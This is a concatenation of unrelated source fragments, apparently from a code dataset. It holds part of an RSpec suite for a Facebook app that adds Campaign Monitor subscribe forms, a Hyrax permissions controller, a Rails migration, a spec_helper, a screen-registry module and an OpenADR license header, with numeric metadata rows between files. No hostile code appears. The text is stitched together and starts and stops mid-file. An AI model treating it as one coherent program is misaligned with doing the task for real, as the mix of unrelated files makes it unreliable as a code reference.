let(:page_id) { "7687687687" }
context "when the user has not added the app to the page" do
before do
stub_request(:get, "http://graph.facebook.com/v2.2/7687687687").
to_return(:status => 200, :body => %Q[{"id":"#{page_id}","has_added_app":false,"link":"https://www.facebook.com/pages/my-page/#{page_id}"}])
end
it "shows the settings saved page" do
get "/saved/#{page_id}"
expect(last_response.status).to eq(200)
expect(last_response.body).to \
include(%Q[top.location = "http://www.facebook.com/add.php?api_key=testapikey&pages=1&page=#{page_id}";])
end
end
context "when the user has added the app to the page" do
before do
stub_request(:get, "http://graph.facebook.com/v2.2/7687687687").
to_return(:status => 200, :body => %Q[{"id":"#{page_id}","has_added_app":true,"link":"https://www.facebook.com/pages/my-page/#{page_id}"}])
end
it "shows the settings saved page" do
get "/saved/#{page_id}"
expect(last_response.status).to eq(200)
expect(last_response.body).to \
include(%Q[top.location = "https://www.facebook.com/pages/my-page/#{page_id}";])
end
end
end
describe "POST /apikey" do
context "when the Campaign Monitor API key is successfully retrieved" do
before do
stub_request(:get, "https://myusername:[email protected]/api/v3/apikey.json?SiteUrl=https://myaccount.createsend.com").
with(:headers => { "Content-Type" => "application/json; charset=utf-8" }).
to_return(:status => 200,
:headers => { "Content-Type" => "application/json; charset=utf-8" },
:body => %Q[{ "ApiKey": "#{cm_api_key}" }])
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients.json").
to_return(
:status => 200,
:body => %Q[[{"ClientID":"clientid","Name":"client name"}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "returns a json payload containing account details" do
post "/apikey", {
"site_url" => "https://myaccount.createsend.com",
"username" => "myusername",
"password" => "mypassword"
}, {
"rack.session" => {
"fb_auth" => { "uid" => user_id }, "fb_token" => fb_token
}
}
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to \
eq(%Q[{"account":{"api_key":"#{cm_api_key}","user_id":"#{user_id}","clients":[{"ClientID":"clientid","Name":"client name"}]}}])
end
end
context "when the Campaign Monitor API key is not successfully retrieved" do
before do
stub_request(:get, "https://myusername:[email protected]/api/v3/apikey.json?SiteUrl=https://myaccount.createsend.com").
with(:headers => { "Content-Type" => "application/json; charset=utf-8" }).
to_return(:status => 400,
:headers => { "Content-Type" => "application/json; charset=utf-8" },
:body => %Q[{ "Code": 123, "Message": "Invalid username/password" }])
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
end
it "returns a json payload containing an error message" do
post "/apikey", {
"site_url" => "https://myaccount.createsend.com",
"username" => "myusername",
"password" => "incorrectpassword"
}, {
"rack.session" => {
"fb_auth" => { "uid" => user_id }, "fb_token" => fb_token
}
}
expect(last_response.status).to eq(400)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to \
eq(%Q[{"message":"Error getting API key..."}])
end
end
end
describe "GET /clients/:api_key" do
context "when a call to the Campaign Monitor API succeeds" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients.json").
to_return(
:status => 200,
:body => %Q[[{"ClientID":"clientid","Name":"client name"}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets the clients for the account matching the api key" do
get "/clients/#{cm_api_key}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[[{"ClientID":"clientid","Name":"client name"}]])
end
end
context "when a call to the Campaign Monitor API fails" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients.json").
to_return(
:status => 500,
:body => %Q[[{"Code": 500,"Message":"Sorry."}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets an empty list" do
get "/clients/#{cm_api_key}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq("[]")
end
end
end
describe "GET /lists/:api_key/:client_id" do
let(:client_id) { "43242343" }
context "when a call to the Campaign Monitor API succeeds" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients/#{client_id}/lists.json").
to_return(
:status => 200,
:body => %Q[[{"ListID":"listid","Name":"list name"}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets the subscriber lists for the client" do
get "/lists/#{cm_api_key}/#{client_id}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[[{"ListID":"listid","Name":"list name"}]])
end
end
context "when a call to the Campaign Monitor API fails" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients/#{client_id}/lists.json").
to_return(
:status => 500,
:body => %Q[[{"Code": 500,"Message":"Sorry."}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets an empty list" do
get "/lists/#{cm_api_key}/#{client_id}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq("[]")
end
end
end
describe "GET /customfields/:api_key/:list_id" do
let(:list_id) { "323231223" }
context "when a call to the Campaign Monitor API succeeds" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/lists/#{list_id}/customfields.json").
to_return(
:status => 200,
:body => %Q[[{"FieldName":"website","Key":"[website]","DataType":"Text","FieldOptions":[],"VisibleInPreferenceCenter":true}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets the custom fields for the list" do
get "/customfields/#{cm_api_key}/#{list_id}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[[{"FieldName":"website","Key":"[website]","DataType":"Text","FieldOptions":[],"VisibleInPreferenceCenter":true}]])
end
end
context "when a call to the Campaign Monitor API fails" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/lists/#{list_id}/customfields.json").
to_return(
:status => 500,
:body => %Q[[{"Code": 500,"Message":"Sorry."}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets an empty list" do
get "/customfields/#{cm_api_key}/#{list_id}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq("[]")
end
end
end
describe "POST /page/:page_id" do
context "when saving a new subscribe form for a page" do
let(:page_id) { "7687687687" }
let(:page_name) { "test page" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:intro_message) { "Intro message!" }
let(:thanks_message) { "Thanks!" }
let(:include_name) { true }
before do
account.save
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
stub_request(:get, "https://graph.facebook.com/v2.2/7687687687?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{page_id}","name":"#{page_name}","has_added_app":true,"link":"https://www.facebook.com/pages/my-page/#{page_id}"}])
stub_request(:get, "https://testapikey:[email protected]/api/v3/lists/#{list_id}/customfields.json").
to_return(
:status => 200,
:body => %Q[[{"FieldName":"website","Key":"[website]","DataType":"Text","FieldOptions":[],"VisibleInPreferenceCenter":true}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "saves the form and returns a json payload containing the success message" do
post "/page/#{page_id}",
{ "facebook" => { "user_id" => user_id },
"api_key" => cm_api_key, "list_id" => list_id, "client_id" => client_id,
"intro_message" => intro_message, "thanks_message" => thanks_message,
"include_name" => include_name
},
{ "rack.session" => { "fb_auth" => { "uid" => user_id }, "fb_token" => fb_token } }
form = account.forms.first(:page_id => page_id)
expect(form.intro_message).to eq(intro_message)
expect(form.thanks_message).to eq(thanks_message)
expect(form.include_name).to eq(include_name)
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[{"status":"success","message":"Thanks, you successfully saved your subscribe form for #{page_name}."}])
end
end
context "when saving an existing subscribe form for a page" do
let(:page_id) { "7687687687" }
let(:page_name) { "test page" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
let(:intro_message) { "New intro message!" }
let(:thanks_message) { "Thank you." }
let(:include_name) { false }
before do
account.save
form.save
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
stub_request(:get, "https://graph.facebook.com/v2.2/7687687687?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{page_id}","name":"#{page_name}","has_added_app":true,"link":"https://www.facebook.com/pages/my-page/#{page_id}"}])
stub_request(:get, "https://testapikey:[email protected]/api/v3/lists/#{list_id}/customfields.json").
to_return(
:status => 200,
:body => %Q[[{"FieldName":"multiselect","Key":"[multiselect]","DataType":"MultiSelectMany","FieldOptions":["one","two","three"],"VisibleInPreferenceCenter":true}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "saves the form and returns a json payload containing the success message" do
post "/page/#{page_id}",
{ "facebook" => { "user_id" => user_id },
"api_key" => cm_api_key, "list_id" => list_id, "client_id" => client_id,
"intro_message" => intro_message, "thanks_message" => thanks_message,
"include_name" => include_name, "cf-multiselect" => "checked"
},
{ "rack.session" => { "fb_auth" => { "uid" => user_id }, "fb_token" => fb_token } }
form = account.forms.first(:page_id => page_id)
fields = form.custom_fields
expect(form.intro_message).to eq(intro_message)
expect(form.thanks_message).to eq(thanks_message)
expect(form.include_name).to eq(include_name)
expect(fields.first.name).to eq("multiselect")
expect(fields.first.field_key).to eq("[multiselect]")
expect(fields.first.data_type).to eq("MultiSelectMany")
expect(fields.first.field_options).to eq("one^two^three")
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[{"status":"success","message":"Thanks, you successfully saved your subscribe form for #{page_name}."}])
end
end
end
describe "GET /tab" do
context "when a page hasn't had a subscribe form set up" do
it "shows that the page hasn't had a subscribe form set up yet" do
get "/tab"
expect(last_response.status).to eq(200)
expect(last_response.body).to \
include("This page hasn't had a subscribe form set up yet")
end
end
context "when a page has had a subscribe form set up" do
let(:page_id) { "7687687687" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
before do
account.save
form.save
end
it "shows the saved subscribe form" do
get "/tab",
{ "facebook" => { "user_id" => user_id, "page" => { "id" => page_id } } }
expect(last_response.status).to eq(200)
expect(last_response.body).to include(form.intro_message)
end
end
end
describe "POST /subscribe/:page_id" do
context "when someone subscribes successfully" do
let(:page_id) { "7687687687" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
before do
account.save
form.save
stub_request(:post, "https://testapikey:[email protected]/api/v3/subscribers/testlistid.json").
with(
:body => %Q[{"EmailAddress":"[email protected]","Name":"test subscriber","CustomFields":[{"Key":"[website]","Value":"https://example.com/"},{"Key":"[multiselect]","Value":"one"},{"Key":"[multiselect]","Value":"three"}],"Resubscribe":true,"RestartSubscriptionBasedAutoresponders":false}],
:headers => { "Content-Type" => "application/json; charset=utf-8" }).
to_return(:status => 200, :body => "[email protected]")
end
it "returns a json payload containing the success message" do
post "/subscribe/#{page_id}", {
"facebook" => { "user_id" => user_id, "page" => { "id" => page_id } },
"name" => "test subscriber",
"email" => "[email protected]",
"cf-website" => "https://example.com/",
"cf-multiselect" => [ "one", "three" ]
}
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to \
eq(%Q[{"status":"success","message":"#{form.thanks_message}"}])
end
end
context "when subscribing fails" do
let(:page_id) { "7687687687" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
before do
account.save
form.save
stub_request(:post, "https://testapikey:[email protected]/api/v3/subscribers/testlistid.json").
with(
:body => %Q[{"EmailAddress":"not an email address","Name":"test subscriber","CustomFields":[{"Key":"[website]","Value":"https://example.com/"}],"Resubscribe":true,"RestartSubscriptionBasedAutoresponders":false}],
:headers => { "Content-Type" => "application/json; charset=utf-8" }).
to_return(:status => 400,
:headers => { "Content-Type" => "application/json; charset=utf-8" },
:body => %Q[{ "Code": 1, "Message": "Invalid email address" }])
end
it "returns a json payload containing the error details" do
post "/subscribe/#{page_id}", {
"facebook" => { "user_id" => user_id, "page" => { "id" => page_id } },
"name" => "test subscriber",
"email" => "not an email address",
"cf-website" => "https://example.com/"
}
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to \
eq(%Q[{"status":"error","message":"Sorry, there was a problem subscribing you to our list. Please try again."}])
end
end
end
describe "GET /ondeauth" do
it "deletes any accounts associated with the fb user and responds with 200 OK" do
get "/ondeauth", { "facebook" => { "user_id" => user_id } }
accounts = Account.all(:user_id => user_id)
expect(accounts).to eq([])
expect(last_response.status).to eq(200)
end
end
describe "GET /auth/failure" do
it "clears the session and redirects to /" do
get "/auth/failure"
expect(last_request.env["rack.session"]["fb_auth"]).to be_nil
expect(last_request.env["rack.session"]["fb_token"]).to be_nil
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/")
end
end
describe "GET /logout" do
it "clears the session and redirects to /" do
get "/logout"
expect(last_request.env["rack.session"]["fb_auth"]).to be_nil
expect(last_request.env["rack.session"]["fb_token"]).to be_nil
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/")
end
end
describe "GET /privacy" do
it "shows the privacy page" do
get "/privacy"
expect(last_response.status).to eq(200)
expect(last_response.body).to \
include("The Campaign Monitor Subscribe Form app respect's the privacy of people who use it")
end
end
describe "GET /nothingtoseehere" do
it "shows the app's 404 Not Found page" do
get "/nothingtoseehere"
expect(last_response.status).to eq(404)
expect(last_response.body).to \
include("We don't recognise that as part of Campaign Monitor Subscribe Form - sorry!")
end
end
describe "GET /boom" do
it "shows the app's 500 Server Error page" do
expect do
get "/boom"
expect(last_response.status).to eq(500)
expect(last_response.body).to \
include("We're really sorry that there's something wrong with Campaign Monitor Subscribe Form")
end.to raise_error
end
end
describe "GET /reset.css" do
it "serves the reset.css stylesheet" do
get "/reset.css"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("text/css;charset=utf-8")
end
end
describe "GET /cm.css" do
it "serves the cm.css stylesheet" do
get "/cm.css"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("text/css;charset=utf-8")
end
end
describe "GET /fb.css" do
it "serves the fb.css stylesheet" do
get "/fb.css"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("text/css;charset=utf-8")
end
end
end
| 39.945985 | 298 | 0.595585 |
ed85b7e1a615f7387f3c51ade8289efe17526ae5 | 1,259 | # frozen_string_literal: true
module Hyrax
class PermissionsController < ApplicationController
helper_method :curation_concern
def confirm
# intentional noop to display default view
end
deprecation_deprecate confirm: "Use the #confirm_access action instead."
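    # Queues a VisibilityCopyJob for the work; the job propagates the work's
    # visibility setting to its members in the background.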
def copy
authorize! :edit, curation_concern
VisibilityCopyJob.perform_later(curation_concern)
flash_message = 'Updating file permissions. This may take a few minutes. You may want to refresh your browser or return to this record later to see the updated file permissions.'
redirect_to [main_app, curation_concern], notice: flash_message
end
def confirm_access
# intentional noop to display default view
end
def copy_access
authorize! :edit, curation_concern
# copy visibility
VisibilityCopyJob.perform_later(curation_concern)
# copy permissions
InheritPermissionsJob.perform_later(curation_concern)
redirect_to [main_app, curation_concern], notice: I18n.t("hyrax.upload.change_access_flash_message")
end
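    # Memoizes the work looked up from the :id route param; with
    # use_valkyrie: false the query service hands back the ActiveFedora model
    # rather than a Valkyrie resource.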
def curation_concern
@curation_concern ||= Hyrax.query_service.find_by_alternate_identifier(alternate_identifier: params[:id], use_valkyrie: false)
end
end
end
| 34.027027 | 184 | 0.752979 |
b9cade92151af813a70f332b6052bb3a49c8af4b | 487 | class DropUnusedDatabaseColumns < ActiveRecord::Migration
def self.up
remove_column :ownerships, :approved
remove_column :versions, :downloads_count
drop_table :downloads
end
def self.down
create_table "downloads" do |t|
t.integer "version_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_column :versions, :downloads_count, :integer, :default => 0
add_column :ownerships, :approved, :boolean, :default => false
end
end
| 27.055556 | 67 | 0.706366 |
ace84c90f48ad0cf37a83359b40d57624591db1d | 44 | require 'resque'
require 'resque/scheduler'
| 14.666667 | 26 | 0.795455 |
334c49fe4c7977889814ca137a09a663edf882fe | 4,296 | require File.expand_path("../../lib/s3-wrapper", __FILE__)
require 'spec_prepare'
# This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause this
# file to always be loaded, without a need to explicitly require it in any files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
# Limits the available syntax to the non-monkey patched syntax that is recommended.
# For more details, see:
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
end
| 47.208791 | 129 | 0.744646 |
ac4db34519aa107a25519823a057cb2899a26160 | 849 | Pod::Spec.new do |s|
s.name = "StreamingKit"
s.version = "0.1.21"
s.summary = "A fast and extensible audio streamer for iOS and OSX with support for gapless playback and custom (non-HTTP) sources."
s.homepage = "https://github.com/tumtumtum/StreamingKit/"
s.license = 'MIT'
s.author = { "Thong Nguyen" => "[email protected]" }
s.source = { :git => "https://github.com/tumtumtum/StreamingKit.git", :tag => s.version.to_s}
s.platform = :ios
s.requires_arc = true
s.source_files = 'StreamingKit/StreamingKit/*.{h,m}'
s.ios.deployment_target = '4.3'
s.ios.frameworks = 'SystemConfiguration', 'CFNetwork', 'CoreFoundation', 'AudioToolbox'
s.osx.deployment_target = '10.7'
s.osx.frameworks = 'SystemConfiguration', 'CFNetwork', 'CoreFoundation', 'AudioToolbox', 'AudioUnit'
end
| 49.941176 | 138 | 0.660777 |
e25a7cc04f87cbf3ab6855d3bdd4a4d4ea2b1d08 | 2,264 | require 'yaml'
require 'oj'
require 'pry'
require_relative 'screen/group'
require_relative 'screen/definition'
module Hippo
module Screen
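    # Module-level registries shared by every extension: GROUPS lazily builds a
    # Group per identifier, DEFINITIONS maps screen ids to Definition objects,
    # and EXTENSIONS caches one DefinitionList per extension id.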
    GROUPS = Hash.new { |h, k| g = Group.new; g.identifier = k; h[k] = g }
DEFINITIONS = Hash.new
EXTENSIONS = Hash.new
mattr_accessor :enabled_group_ids
class DefinitionList
attr_reader :ids
include Enumerable
def initialize(extension_id)
@ids = []
@extension_id = extension_id
end
def define(id)
ids.push(id)
definition = (DEFINITIONS[id] ||= Definition.new(id, @extension_id))
yield definition
end
def extend(id)
ids.push(id)
definition = DEFINITIONS[id]
definition.extension_id = @extension_id
yield definition if block_given?
end
def each
ids.each { |id| yield DEFINITIONS[id] }
end
end
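    # A minimal usage sketch of the DSL above (what gets configured inside the
    # inner block depends on Definition's attributes and is omitted here):
    #
    #   Hippo::Screen.for_extension('my_ext') do |screens|
    #     screens.define('dashboard') do |screen|
    #       # set the Definition's access rules and UI metadata
    #     end
    #   end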
class << self
include Enumerable
def [](config)
if DEFINITIONS.key?(config)
DEFINITIONS[config]
else
nil
end
end
def each
DEFINITIONS.values.each { |s| yield s }
end
def for_extension(id)
definition = EXTENSIONS[id] ||= DefinitionList.new(id)
yield definition if block_given?
definition
end
def define_group(id)
group = GROUPS[id]
yield group
end
def ids_for_user(user)
Extensions.load_screens
for_extension(Hippo::Extensions.controlling.identifier).select{|s|
s.viewable_by?(user)
}.map(&:identifier)
end
def each_group
Extensions.load_screens
GROUPS.values.each{ | group | yield group }
end
def config_file
Hippo::Extensions.controlling.root_path.join("config", "screens.rb")
end
end
end
end
| 24.344086 | 84 | 0.487633 |
4ab673cdb06d552afa6483313f58321ea5df7eba | 15,601 | #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# Copyright (c) 2016, Electric Power Research Institute (EPRI)
# All rights reserved.
#
# OpenADR ("this software") is licensed under BSD 3-Clause license.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of EPRI nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
#
# This EPRI software incorporates work covered by the following copyright and permission
# notices. You may not use these works except in compliance with their respective
# licenses, which are provided below.
#
# These works are provided by the copyright holders and contributors "as is" and any express or
# implied warranties, including, but not limited to, the implied warranties of merchantability
# and fitness for a particular purpose are disclaimed.
#
#########################################################################################
# MIT Licensed Libraries
#########################################################################################
#
# * actionmailer 3.2.12 (http://www.rubyonrails.org) - Email composition, delivery, and receiving framework (part of Rails).
# * actionpack 3.2.12 (http://www.rubyonrails.org) - Web-flow and rendering framework putting the VC in MVC (part of Rails).
# * activemodel 3.2.12 (http://www.rubyonrails.org) - A toolkit for building modeling frameworks (part of Rails).
# * activerecord 3.2.12 (http://www.rubyonrails.org) - Object-relational mapper framework (part of Rails).
# * activeresource 3.2.12 (http://www.rubyonrails.org) - REST modeling framework (part of Rails).
# * activesupport 3.2.12 (http://www.rubyonrails.org) - A toolkit of support libraries and Ruby core extensions extracted from the Rails framework.
# * arel 3.0.2 (http://github.com/rails/arel) - Arel is a SQL AST manager for Ruby
# * bootstrap-sass 3.1.1.0 (https://github.com/twbs/bootstrap-sass) - Twitter's Bootstrap, converted to Sass and ready to drop into Rails or Compass
# * builder 3.0.4 (http://onestepback.org) - Builders for MarkUp.
# * bundler 1.12.5 (http://bundler.io) - The best way to manage your application's dependencies
# * capybara 2.4.4 (http://github.com/jnicklas/capybara) - Capybara aims to simplify the process of integration testing Rack applications, such as Rails, Sinatra or Merb
# * coffee-rails 3.2.2 () - Coffee Script adapter for the Rails asset pipeline.
# * coffee-script-source 1.6.3 (http://jashkenas.github.com/coffee-script/) - The CoffeeScript Compiler
# * docile 1.1.5 (https://ms-ati.github.io/docile/) - Docile keeps your Ruby DSLs tame and well-behaved
# * edn 1.0.0 () - 'edn implements a reader for Extensible Data Notation by Rich Hickey.'
# * erubis 2.7.0 (http://www.kuwata-lab.com/erubis/) - a fast and extensible eRuby implementation which supports multi-language
# * execjs 1.4.0 (https://github.com/sstephenson/execjs) - Run JavaScript code from Ruby
# * factory_girl 4.5.0 (https://github.com/thoughtbot/factory_girl) - factory_girl provides a framework and DSL for defining and using model instance factories.
# * factory_girl_rails 4.5.0 (http://github.com/thoughtbot/factory_girl_rails) - factory_girl_rails provides integration between factory_girl and rails 3
# * gem-licenses 0.1.2 (http://github.com/dblock/gem-licenses) - List all gem licenses.
# * hike 1.2.3 (http://github.com/sstephenson/hike) - Find files in a set of paths
# * i18n 0.6.5 (http://github.com/svenfuchs/i18n) - New wave Internationalization support for Ruby
# * jdbc-postgresql 9.2.1000 (https://github.com/rosenfeld/jdbc-postgresql) - PostgresSQL jdbc driver for JRuby
# * journey 1.0.4 (http://github.com/rails/journey) - Journey is a router
# * jquery-rails 3.0.4 (http://rubygems.org/gems/jquery-rails) - Use jQuery with Rails 3
# * json-schema 2.6.2 (http://github.com/ruby-json-schema/json-schema/tree/master) - Ruby JSON Schema Validator
# * mail 2.4.4 (http://github.com/mikel/mail) - Mail provides a nice Ruby DSL for making, sending and reading emails.
# * metaclass 0.0.4 (http://github.com/floehopper/metaclass) - Adds a metaclass method to all Ruby objects
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
# * mocha 1.1.0 (http://gofreerange.com/mocha/docs) - Mocking and stubbing library
# * multi_json 1.7.9 (http://github.com/intridea/multi_json) - A common interface to multiple JSON libraries.
# * nokogiri 1.6.5 (http://nokogiri.org) - Nokogiri (鋸) is an HTML, XML, SAX, and Reader parser
# * polyglot 0.3.3 (http://github.com/cjheath/polyglot) - Augment 'require' to load non-Ruby file types
# * rack-test 0.6.2 (http://github.com/brynary/rack-test) - Simple testing API built on Rack
# * railties 3.2.12 (http://www.rubyonrails.org) - Tools for creating, working with, and running Rails applications.
# * rake 10.1.0 (http://rake.rubyforge.org) - Ruby based make-like utility.
# * rspec-core 2.14.3 (http://github.com/rspec/rspec-core) - rspec-core-2.14.3
# * rspec-expectations 2.14.0 (http://github.com/rspec/rspec-expectations) - rspec-expectations-2.14.0
# * rspec-mocks 2.14.1 (http://github.com/rspec/rspec-mocks) - rspec-mocks-2.14.1
# * rspec-rails 2.14.0 (http://github.com/rspec/rspec-rails) - rspec-rails-2.14.0
# * sass 3.2.9 (http://sass-lang.com/) - A powerful but elegant CSS compiler that makes CSS fun again.
# * sass-rails 3.2.6 () - Sass adapter for the Rails asset pipeline.
# * simplecov 0.9.0 (http://github.com/colszowka/simplecov) - Code coverage for Ruby 1.9+ with a powerful configuration library and automatic merging of coverage across test suites
# * spork 1.0.0rc3 (http://github.com/sporkrb/spork) - spork
# * therubyrhino 2.0.2 (http://github.com/cowboyd/therubyrhino) - Embed the Rhino JavaScript interpreter into JRuby
